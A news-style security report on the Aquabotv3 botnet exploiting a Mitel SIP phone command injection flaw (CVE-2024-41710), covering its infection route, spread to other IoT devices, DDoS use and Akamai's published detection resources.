A new variant of the Mirai-based Aquabot botnet, known as Aquabotv3, has been actively exploiting a command injection vulnerability in Mitel SIP phones. The vulnerability, identified as CVE-2024-41710, affects various models of Mitel phones, including the 6800, 6900, and 6900w series. The flaw is a medium-severity issue that allows an authenticated attacker with admin privileges to conduct an argument injection attack, potentially leading to arbitrary command execution. Mitel released security fixes and advisories in July 2024, but Aquabotv3 represents the first documented case of the botnet exploiting this vulnerability, which was first revealed in a proof-of-concept by security researcher Kyle Burns in late July.
Akamai’s Security Intelligence and Response Team (SIRT) detected Aquabotv3’s exploitation of this flaw in early January 2025. The malware targets the vulnerable 8021xsupport.html endpoint in Mitel phones, which improperly processes user input during the boot process. This allows attackers to inject commands into the phone’s local configuration file and execute a remote shell script that installs the Aquabot payload. The malware then sets itself up with persistence, ensuring that it can continue to function even after the device is rebooted. After installation, Aquabotv3 connects to its command-and-control (C2) server to receive further instructions, attack commands, or additional payloads.
Once installed, Aquabotv3 actively attempts to spread to other vulnerable devices on the same network.
It uses a variety of known vulnerabilities to target other Internet of Things (IoT) devices, including flaws in TP-Link routers, Linksys devices, and Dasan routers, among others. Additionally, the malware attempts to brute-force weak SSH and Telnet credentials to gain access to poorly secured devices. The botnet’s ultimate goal is to add these devices to its distributed denial-of-service (DDoS) swarm, which can then be used to conduct large-scale attacks, including TCP SYN, TCP ACK, and application-layer assaults.
Aquabotv3’s operators promote their botnet’s DDoS capabilities through various channels, including Telegram, where they advertise it under different names like Cursinq Firewall, The Eye Services, and The Eye Botnet. This is done in a bid to offer their services as testing tools for DDoS mitigation measures. Akamai has provided detailed indicators of compromise (IoC) for detecting Aquabotv3, along with Snort and YARA rules, to help organizations identify and protect against the malware. These resources are part of Akamai’s ongoing efforts to raise awareness and mitigate the risks posed by this evolving botnet.
